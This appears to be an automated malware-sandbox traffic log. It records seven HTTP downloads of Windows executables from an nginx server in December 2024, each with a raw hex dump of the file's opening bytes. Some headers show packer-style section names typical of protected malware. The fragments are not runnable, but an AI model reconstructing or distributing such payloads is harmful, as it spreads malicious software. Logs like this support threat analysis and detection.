                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:14:30 GMTContent-Type: application/octet-streamContent-Length: 1863680Last-Modified: Fri, 20 Dec 2024 13:47:02 GMTConnection: keep-aliveETag: "67657556-1c7000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 32 fc 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 7a 69 67 63 76 76 6a 00 f0 19 00 00 70 2f 00 00 ec 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 64 73 71 6d 77 6f 73 00 10 00 00 00 60 49 00 00 04 00 00 00 4a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 4e 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:14:38 GMTContent-Type: application/octet-streamContent-Length: 776832Last-Modified: Tue, 17 Dec 2024 09:45:14 GMTConnection: keep-aliveETag: "6761482a-bda80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 9c 04 00 00 d0 02 00 00 9c 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 9c 04 00 00 70 07 00 00 9c 04 00 00 10 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:14:45 GMTContent-Type: application/octet-streamContent-Length: 4453888Last-Modified: Fri, 20 Dec 2024 23:24:22 GMTConnection: keep-aliveETag: "6765fca6-43f600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 09 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 56 48 00 00 fc 76 00 00 32 00 00 00 d0 c8 00 00 10 00 00 00 70 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 c9 00 00 04 00 00 c2 11 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 70 74 00 73 00 00 00 00 60 74 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 bc c8 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 bb c8 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 74 00 00 10 00 00 00 4c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 60 74 00 00 02 00 00 00 5c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 74 00 00 02 00 00 00 5e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 38 00 00 80 74 00 00 02 00 00 00 60 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 70 74 74 73 77 6d 79 00 70 1b 00 00 50 ad 00 00 6e 1b 00 00 62 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6c 7a 74 6c 74 67 63 00 10 00 00 00 c0 c8 00 00 04 00 00 00 d0 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 c8 00 00 22 00 00 00 d4 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:14:58 GMTContent-Type: application/octet-streamContent-Length: 1374720Last-Modified: Thu, 19 Dec 2024 17:14:58 GMTConnection: keep-aliveETag: "67645492-14fa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 e0 68 17 44 00 8c 14 00 e1 14 00 00 e0 00 26 03 0b 01 02 26 00 c8 0b 00 00 f6 14 00 00 04 00 00 80 14 00 00 00 10 00 00 00 e0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 70 15 00 00 04 00 00 5c 55 1a 00 02 00 40 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 14 00 08 1c 00 00 00 90 14 00 2c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 bc 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 8e 12 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 54 14 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 c7 0b 00 00 10 00 00 00 c8 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 48 01 00 00 00 e0 0b 00 00 02 00 00 00 cc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 98 a1 06 00 00 f0 0b 00 00 a2 06 00 00 ce 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 65 68 5f 66 72 61 6d ec 94 01 00 00 a0 12 00 00 96 01 00 00 70 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 34 02 00 00 00 40 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 08 1c 00 00 00 50 14 00 00 1e 00 00 00 06 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 70 14 00 00 02 00 00 00 24 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 80 14 00 00 02 00 00 00 26 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 2c 6c 00 00 00 90 14 00 00 6e 00 00 00 28 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 63 00 00 00 00 15 00 00 64 00 00 00 96 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:15:05 GMTContent-Type: application/octet-streamContent-Length: 1114112Last-Modified: Thu, 19 Dec 2024 03:43:46 GMTConnection: keep-aliveETag: "67639672-110000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 24 95 63 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 cc 10 00 00 32 00 00 00 00 00 00 ee ea 10 00 00 20 00 00 00 00 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 ea 10 00 57 00 00 00 00 00 11 00 48 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ca 10 00 00 20 00 00 00 cc 10 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 2f 00 00 00 00 11 00 00 30 00 00 00 ce 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 11 00 00 02 00 00 00 fe 10 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 ea 10 00 00 00 00 00 48 00 00 00 02 00 05 00 f0 3c 10 00 a4 ad 00 00 03 00 00 00 4b 00 00 06 90 cc 00 00 60 70 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 59 3f a8 46 36 30 84 8d 99 35 b2 d7 ba 38 1a 04 e1 c1 34 7a 63 cb 3a 03 56 92 13 f5 e3 07 ce b0 b7 af 4e 86 30 c8 a0 a9 18 31 bb 9b aa d3 d6 97 4f 2a 18 53 9a e6 7e 04 d9 f6 cb a2 c0 0c f1 49 85 ff a2 70 52 05 b8 69 49 c0 d2 09 93 f6 80 50 6e 7d 9b 0e d8 a3 69 4a 21 42 48 8d 2b 6f 2f 53 ce de 79 6a a1 0e 91 38 54 27 cb 7d fa c0 ca 0f 79 ae 49 a7 6b 44 18 0d cd ef cf 27 f4 88 c7 1c f4 24 c4 36 fa f9 8d ca 7d ad 9c 77 5b db 20 29 e0 89 13 6a 80 07 5b bd 2d 16 d1 30 b8 af 9b bc 7c 7f 95 97 70 cc 12 c3 e3 68 5c 1f ff 4c 8a be b5 18 52 d9 54 96 7e 14 b4 9a 8f 1a 04 62 14 4b 86 68 b2 f1 85 12 0a 22 07 38 c7 73 60 29 e1 f6 9a 31 dd bf b1 13 20 c5 cc aa 98 9e 5b 69 26 ce 39 95 e8 9a 8a 81 a4 61 3f 19 46 03 89 4e 1d d7 98 7e f5 ff cd 5f 12 5e 7f 1b 8e 51 88 1e b8 db bc e6 34 33 f7 4c 97 80 01 81 c2 40 76 b3 89 e6 78 c5 ae 07 49 42 ed 34 de da f1 ba c2 0c 8a b7 f3 9a f3 f4 ac 7c bc 00 05 b9 9e c6 28 8a f1 f1 82 ed c7 cc a1 03 ab 7e 18 59 f7
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:15:14 GMTContent-Type: application/octet-streamContent-Length: 22016Last-Modified: Thu, 19 Dec 2024 14:25:14 GMTConnection: keep-aliveETag: "67642cca-5600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 0f 37 94 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 4c 00 00 00 08 00 00 00 00 00 00 8e 6a 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 6a 00 00 4f 00 00 00 00 80 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 a8 69 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 4a 00 00 00 20 00 00 00 4c 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac 05 00 00 00 80 00 00 00 06 00 00 00 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 6a 00 00 00 00 00 00 48 00 00 00 02 00 05 00 28 37 00 00 80 32 00 00 03 00 02 00 1b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 38 00 00 00 01 00 00 11 73 2f 00 00 06 0a 06 28 16 00 00 0a 7d 20 00 00 04 06 02 7d 21 00 00 04 06 15 7d 1f 00 00 04 06 7c 20 00 00 04 12 00 28 01 00 00 2b 06 7c 20 00 00 04 28 18 00 00 0a 2a 13 30 02 00 50 00 00 00 02 00 00 11 00 7e 02 00 00 04 16 fe 01 0a 06 2c 42 00 72 01 00 00 70 28 19 00 00 0a 00 72 84 00 00 70 28 19 00 00 0a 00 28 05 00 00 06 0b 72 ca 00 00 70 07 28 1a 00 00 0a 28 19 00 00 0a 00 07 28 04 00 00 06 6f 1b 00 00 0a 00 16 28 1c 00 00 0a 00 00 2a 13 30 02 00 38 00 00 00 03 00 00 11 73 32 00 00 06 0a 06 28 16 00 00 0a 7d 28 00 00 04 06 02 7d 29 00 00 04 06 15 7d 27 00 00 04 06 7c 28 00 00 04 12 00 28 02 00 00 2b 06 7c 28 00 00 04 28 18 00 00 0a 2a 13 30 05 00 48 00 00 00 04 00 00 11 00 73 1d 00 00 0a 0a 1a 8d 2f 00 00 01 0b 16 0c 2b 1c 00 07 08 7e 03 00 00 04 06 7e 03 00 00 04 8e 69 6f 1e 00 00 0a 9a a2 00 08 17 58 0c 08 1a fe 04 0d 09 2d dc 72 f0 00 00 70 07 28 1f 00 00 0a 13 04 2b 00 11 04 2a 13 30 02 00 16
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 00:15:22 GMTContent-Type: application/octet-streamContent-Length: 4454912Last-Modified: Sat, 21 Dec 2024 00:01:10 GMTConnection: keep-aliveETag: "67660546-43fa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 07 98 63 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 4a 49 00 00 4c 75 00 00 32 00 00 00 c0 c6 00 00 10 00 00 00 60 49 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 04 00 00 06 0e 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f b0 72 00 73 00 00 00 00 a0 72 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 a4 c6 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 a4 c6 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 72 00 00 10 00 00 00 34 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 72 00 00 02 00 00 00 44 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 72 00 00 02 00 00 00 46 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 38 00 00 c0 72 00 00 02 00 00 00 48 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 65 64 72 72 6a 77 62 00 90 1b 00 00 20 ab 00 00 88 1b 00 00 4a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 74 64 6d 63 73 76 6c 00 10 00 00 00 b0 c6 00 00 06 00 00 00 d2 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 c6 00 00 22 00 00 00 d8 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
